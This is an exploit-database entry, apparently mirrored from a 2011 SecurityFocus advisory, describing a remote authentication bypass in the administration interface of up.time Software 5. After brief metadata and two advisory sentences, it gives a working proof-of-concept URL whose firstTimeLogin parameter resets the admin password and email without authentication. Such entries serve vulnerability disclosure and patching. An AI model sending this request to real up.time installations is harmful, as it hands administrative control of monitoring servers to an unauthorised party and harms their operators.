up.time Software 5 - Administration Interface Remote Authentication Bypass
Author: James Burton
type: webapps
platform: php
port:
date_added: 2011-04-27
date_updated: 2015-01-01
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/47599/info
up.time software is prone to a remote authentication-bypass vulnerability.
Attackers can exploit this issue to bypass authentication and perform unauthorized actions.
up.time 5 is vulnerable; other versions may also be affected.
http://www.example.com:9999/index.php?userid=admin
&firstTimeLogin=True
&password=admin
&confirmPassword=admin
&adminEmail=admin () admin
&monitorEmail=admin () admin